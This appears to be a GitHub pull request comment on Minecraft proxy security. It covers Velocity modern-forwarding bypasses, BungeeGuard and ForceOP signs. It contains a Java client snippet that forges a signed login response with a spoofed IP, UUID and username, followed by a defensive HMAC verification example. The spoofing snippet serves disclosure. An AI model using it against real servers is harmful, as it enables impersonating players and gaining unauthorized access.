@SolsticeSpectrum SolsticeSpectrum commented Oct 16, 2024

  • Changes color for the saw-tooth image for better readability
  • Informs about a vulnerability present in BungeeGuard (I can't detail it now as it's currently a private exploit)
  • Velocity's modern forwarding can be bypassed in a similar way as BungeeCord (it is just a bit harder because the crafted packets are more complex)
  • Informs about Creative and its dangers
  • ForceOP signs given creative are still relevant even in modern Minecraft (e.g. 1.21) in both Spigot and Paper

As for the modern forwarding spoof, it can be done by crafting a special query request packet

        if (packet.getChannel().equals(VELOCITY_CHANNEL) && spoof.isActive()) {
            int requestedForwardingVersion = 1;
            if (packet.getPayload().readableBytes() == 1) requestedForwardingVersion = packet.getPayload().readByte();

            String ip = spoof.getIP();
            byte[] secret = spoof.forwardingSecret.get().getBytes();
            ProfileResponse profile = spoof.getProfile();

            PacketByteBuf buf = new PacketByteBuf(Unpooled.buffer());
            int actualVersion = findForwardingVersion(requestedForwardingVersion);
            buf.writeVarInt(actualVersion);
            buf.writeString(ip);
            buf.writeUuid(profile.getId());
            buf.writeString(spoof.username.get());
            writeProperties(buf, profile.getProperties());

            try {
                SecretKey key = new SecretKeySpec(secret, "HmacSHA256");
                Mac mac = Mac.getInstance("HmacSHA256");
                mac.init(key);
                mac.update(buf.array(), buf.arrayOffset(), buf.readableBytes());
                byte[] sig = mac.doFinal();
                connection.send(new LoginQueryResponseC2SPacket(packet.getQueryId(),
                        new PacketByteBuf(Unpooled.wrappedBuffer(Unpooled.wrappedBuffer(sig), buf))));
                ci.cancel();
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
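
The receiving side of the exchange in the comment above, as an added example that is not part of the pull request and is not Velocity's or Paper's code: a check that a login query response starts with a valid HMAC-SHA256 over the bytes that follow it. The signature-then-payload layout is taken from the snippet; the class name, method names and sample values are hypothetical.

```java
import java.nio.charset.StandardCharsets;
import java.security.GeneralSecurityException;
import java.security.MessageDigest;
import java.util.Arrays;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

public class ForwardingCheck {
    static final int SIG_LEN = 32; // HMAC-SHA256 output size in bytes

    static byte[] hmac(byte[] secret, byte[] data) throws GeneralSecurityException {
        Mac mac = Mac.getInstance("HmacSHA256");
        mac.init(new SecretKeySpec(secret, "HmacSHA256"));
        return mac.doFinal(data);
    }

    /** Returns true only if the response starts with a valid HMAC over the rest. */
    static boolean verify(byte[] secret, byte[] response) throws GeneralSecurityException {
        if (response == null || response.length <= SIG_LEN) return false; // truncated or empty
        byte[] sig = Arrays.copyOfRange(response, 0, SIG_LEN);
        byte[] data = Arrays.copyOfRange(response, SIG_LEN, response.length);
        return MessageDigest.isEqual(sig, hmac(secret, data)); // constant-time compare
    }

    static byte[] concat(byte[] a, byte[] b) {
        byte[] out = Arrays.copyOf(a, a.length + b.length);
        System.arraycopy(b, 0, out, a.length, b.length);
        return out;
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample values, not a real secret or real forwarding data.
        byte[] secret = "constructed-secret".getBytes(StandardCharsets.UTF_8);
        byte[] data = "constructed forwarding fields".getBytes(StandardCharsets.UTF_8);

        byte[] fromProxy = concat(hmac(secret, data), data);
        byte[] wrongKey = concat(hmac("guess".getBytes(StandardCharsets.UTF_8), data), data);
        byte[] tampered = fromProxy.clone();
        tampered[tampered.length - 1] ^= 1; // flip one bit of the forwarded data

        System.out.println("signed with the shared secret: " + verify(secret, fromProxy));
        System.out.println("signed with another key:       " + verify(secret, wrongKey));
        System.out.println("data altered after signing:    " + verify(secret, tampered));
        System.out.println("shorter than a signature:      " + verify(secret, new byte[8]));
    }
}
```

The check accepts any payload signed with the shared secret and cannot tell which party produced it, so it is only as strong as the confidentiality of that secret.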
